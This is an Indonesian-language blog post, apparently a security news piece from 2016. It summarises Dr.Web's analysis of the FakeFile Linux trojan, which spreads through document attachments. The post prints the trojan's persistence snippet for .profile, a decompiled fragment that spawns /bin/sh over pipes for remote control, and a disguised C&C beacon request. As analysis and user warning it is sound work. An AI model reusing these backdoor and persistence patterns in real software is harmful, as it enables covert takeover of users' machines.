Trojan FakeFile Serang Sistem Operasi Linux, Kecuali OpenSUSE

Sunday, October 23, 2016

Sebuah trojan yang menyerang sistem operasi Linux khususnya Desktop ditemukan pada bulan Oktober ini. Vendor Antivirus Rusia Dr.Web telah menganalisis jenis trojan baru ini dan mengatakan bahwa trojan ini tersebar dalam bentuk PDF, Microsoft Office, dan Open Office.

Trojan ini tidak menyerang distro openSUSE
Infeksi trojan ini dimulai saat kita membuka file yang terinfeksi, kemudian akan menggandakan dirinya ke file
~/.gconf/apps/gnome-common/gnome-common
Trojan ini juga membuat shortcut ke file .profile milik user dan .bash_profile yang memnungkinkan file ini tetap berjalan bahkan setelah di reboot (persistance).
Berikut script nya :
# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
    "$HOME/.gconf/apps/gnome-common/gnome-common"
fi
Anehnya, trojan memiliki aturan khusus dalam kode sumbernya yang mencegah infeksi ke distro Linux openSUSE. Alasan untuk ini mungkin karena penulis malware menggunakan distro openSUSE, tapi ini hanya spekulasi, karena teori ini belum di verifikasi.
Berikut ini potongan kodesumber trojan FakeFile :
pipe(v32);
pipe(v31);
status = fork();
if ( !status )
{
  close(0);
  dup(v31[0]);
  close(1);
  dup(v32[1]);
  close(2);
  dup(v32[1]);
  close(v32[1]);
  close(v31[0]);
  close(v32[0]);
  close(v31[1]);
  sleep(1u);
  while ( execl("/bin/sh", "/bin/sh", 0) < 0 )
    sleep(1u);
  exit(status);
}
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);
close(1);
dup(v31[1]);
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
write(1, s1, strlen(s1));
write(1, &unk_8053D40, 1u);
Setelah malware diluncurkan, akan ada dua "tugas" yang dilakukan, pertama, mengirim informasi pengguna ke server pusat trojan dengan command and control (C&C). Jika trojan tidak menerima instruksi selama 30menit, mana koneksi akan terputus.
Ketika berbagi informasi dengan C&C server, reply dari server yang menyamar di bawah permintaan HTTP yang terlihat sebagai berikut:
GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string>
HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: * /*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
FakeFile dapat menjalankan command berikut :

Bagian yang paling mengkhawatirkan adalah bahwa FakeFile tidak perlu akses root untuk semua operasi ini, dan dapat bekerja dengan baik dengan izin pengguna saat ini.
U ntuk informasi lebih lanjut mengenai detail virus ini bisa di cek di Dr.Web

Cara penyebaran trojan ini adalah melaui spam yang dilampiri file dokumen. jadi buat kalian yang menerima file dokumen dari email tak dikenal berhati hatilah, karena trojan jenis baru ini mungkin belom terdeteksi virus oleh provider email yang kalian gunakan.

Artikel Terkait Berita ,Linux ,Security

No comments:

Post a Comment